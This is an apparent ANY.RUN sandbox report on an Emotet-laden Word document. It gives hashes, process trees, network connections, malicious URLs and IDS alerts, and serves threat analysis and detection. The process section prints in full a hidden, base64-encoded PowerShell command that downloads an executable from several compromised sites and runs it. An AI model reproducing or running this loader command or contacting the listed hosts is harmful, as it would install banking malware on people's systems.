analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

P0jkvy-gwgs3qvm

Full analysis: https://app.any.run/tasks/57ae115e-1e4a-4e67-92e3-e368b6c188bb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 13:53:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Hic doloribus omnis., Author: Felina Pingpank, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 12:32:00 2019, Last Saved Time/Date: Fri Dec 6 12:32:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 335, Security: 0
MD5:

C2100E290EA736FAEB5D5CF9C5936C0F

SHA1:

C4185DF253DCEBA18A860AA5850D2D2450635505

SHA256:

2E9F7A11A3B81B5B8E72EDFFB8351D1C1657F6E35FB44EA59F5B8900CE27572D

SSDEEP:

1536:I5hb/tR6m6GgYIMF1DMeOY5C6OJsdBpZWSaES12Jbxrtm:ID/tR6m6GgYIMF14eOY5CTsdASaES18y

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 543.exe (PID: 1724)
      • serialfunc.exe (PID: 3960)
      • 543.exe (PID: 3036)
      • serialfunc.exe (PID: 2304)
    • Emotet process was detected

      • 543.exe (PID: 3036)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2852)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2852)
    • PowerShell script executed

      • powershell.exe (PID: 2852)
    • Creates files in the user directory

      • powershell.exe (PID: 2852)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2852)
      • 543.exe (PID: 3036)
    • Starts itself from another location

      • 543.exe (PID: 3036)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2172)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2852)
      • 543.exe (PID: 3036)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 392
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 335
Words: 58
Pages: 1
ModifyDate: 2019:12:06 12:32:00
CreateDate: 2019:12:06 12:32:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Felina Pingpank
Subject: -
Title: Hic doloribus omnis.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 543.exe no specs #EMOTET 543.exe serialfunc.exe no specs serialfunc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2172"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\P0jkvy-gwgs3qvm.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2852powershell -w hidden -en JABFAHcAbABxAHcAeAB0AHcAdwA9ACcAUwBxAGgAaABqAGEAbABwAG0AbwBvACcAOwAkAEQAbwB4AGsAZQBsAGcAbwBkACAAPQAgACcANQA0ADMAJwA7ACQATQBsAHcAZQBjAHIAdwB5AGgAZAB3AHEAPQAnAEcAZgB2AHIAZABxAHYAaABjAHgAYwAnADsAJABQAGgAdABjAGEAbgBkAHoAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABvAHgAawBlAGwAZwBvAGQAKwAnAC4AZQB4AGUAJwA7ACQATgB1AHUAcABpAGQAdgBrAD0AJwBSAHQAagBxAHQAaQBlAGsAcwByAHUAagBnACcAOwAkAEYAeABpAG8AdwByAG8AZwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwAaQBlAE4AVAA7ACQAQQBmAHQAdgBuAGYAaQBuAHgAZgBwAGEAbAA9ACcAaAB0AHQAcABzADoALwAvAG4AYQBnAGUAbAAuAHAAaQBuAHQAbwBnAG8AbwBkAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAGcAZQA5ADYAOAA4AC8AKgBoAHQAdABwADoALwAvAHIAZQBjAHIAZQBhAHQAZQAuAGIAaQBnAGYAaQBsAG0AcAByAG8AZAB1AGMAdABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgB4ADgAdgBmADkAagAxADUAMAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAGkAbgBlAHQAaQA5AC4AYwBvAG0ALwA2AHUAaQA3AG0ALwB4AGwAcwB3AGQAagA2AC8AKgBoAHQAdABwADoALwAvAGkAbgB2AGkAcwBpAG8AbgAtAG0AZQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOQB6ADMANwA1ADAAMQAvACoAaAB0AHQAcAA6AC8ALwBoAGEAbgBhAGkAbQBjAGgAdQByAGMAaAAuAG4AZQB0AC8AagA2AGQANgA0ADUAYgAvADAANQA5AGQAZwByAHoANwAvACcALgAiAHMAUABgAEwASQBUACIAKAAnACoAJwApADsAJABLAHIAegBmAGkAegBjAHcAbwBqAGUAbQBuAD0AJwBOAGcAdgBpAGQAeAB0AHoAYgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAGwAZgBjAHMAbABqAGoAdwBiAHEAagBnACAAaQBuACAAJABBAGYAdAB2AG4AZgBpAG4AeABmAHAAYQBsACkAewB0AHIAeQB7ACQARgB4AGkAbwB3AHIAbwBnAC4AIgBkAG8AdwBOAGwATwBhAGAAZABmAGAAaQBgAGwARQAiACgAJABUAGwAZgBjAHMAbABqAGoAdwBiAHEAagBnACwAIAAkAFAAaAB0AGMAYQBuAGQAegByACkAOwAkAEoAbwBpAGUAbgBiAHMAeABtAHcAPQAnAFgAbwB4AHYAZwBwAHYAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFAAaAB0AGMAYQBuAGQAegByACkALgAiAGwAZQBgAE4ARwB0AEgAIgAgAC0AZwBlACAAMwA3ADUAMgA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAFAAaAB0AGMAYQBuAGQAegByACkAOwAkAE8AbgB4AHAAegByAHIAeAA9ACcATgB0AGgAZwBmAHEAbAB1AHEAYQAnADsAYgByAGUAYQBrADsAJABUAGwAbwBhAHgAcwBtAGMAPQAnAEMAbAB0AHEAcABtAHQAZgB1AHkAeQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABVAHAAbwBiAHkAawB3AGcAZgBsAD0AJwBNAGEAegB1AHoAbABkAGUAeAByAHYAbQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1724"C:\Users\admin\543.exe" C:\Users\admin\543.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3036--fcb73a32C:\Users\admin\543.exe
543.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2304"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe543.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3960--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 235
Read events
1 437
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5DF.tmp.cvr
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B43528B9.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EFDC766.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\994BC42F.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\219AB064.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90E6CD15.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\587BC812.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59C254EB.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47A6F1F0.wmf
MD5:
SHA256:
2172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C84FE931.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2852
powershell.exe
GET
200
206.221.182.74:80
http://recreate.bigfilmproduction.com/wp-includes/2x8vf9j1507/
US
executable
464 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2852
powershell.exe
185.126.218.176:443
nagel.pintogood.com
Netinternet Bilisim Teknolojileri AS
TR
suspicious
2852
powershell.exe
206.221.182.74:80
recreate.bigfilmproduction.com
Choopa, LLC
US
malicious

DNS requests

Domain
IP
Reputation
nagel.pintogood.com
  • 185.126.218.176
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared
recreate.bigfilmproduction.com
  • 206.221.182.74
malicious

Threats

PID
Process
Class
Message
2852
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2852
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2852
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info